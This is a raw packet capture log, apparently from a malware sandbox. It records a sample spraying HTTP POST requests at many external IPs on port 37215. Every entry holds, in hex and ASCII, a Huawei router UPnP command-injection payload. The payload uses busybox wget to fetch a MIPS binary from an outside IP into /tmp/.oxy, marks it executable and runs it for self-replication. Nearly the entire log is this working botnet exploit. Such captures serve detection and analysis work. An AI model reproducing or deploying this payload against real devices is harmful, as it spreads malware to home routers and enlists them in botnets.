69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  938192.168.2.1360278157.41.177.537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.447120905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  939192.168.2.1352432197.199.31.16137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.447222948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  940192.168.2.1338562157.123.239.7837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.447257042 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  941192.168.2.1337898157.44.65.7837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.447292089 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  942192.168.2.1341444157.171.46.13237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.447309971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  943192.168.2.1359480157.33.77.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.447329998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  944192.168.2.1347084157.45.89.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.447443008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  945192.168.2.1344424197.222.102.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.448223114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  946192.168.2.1349560197.48.105.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.448513985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  947192.168.2.1357172197.179.151.23237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.448532104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  948192.168.2.1334806157.38.56.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.448601007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
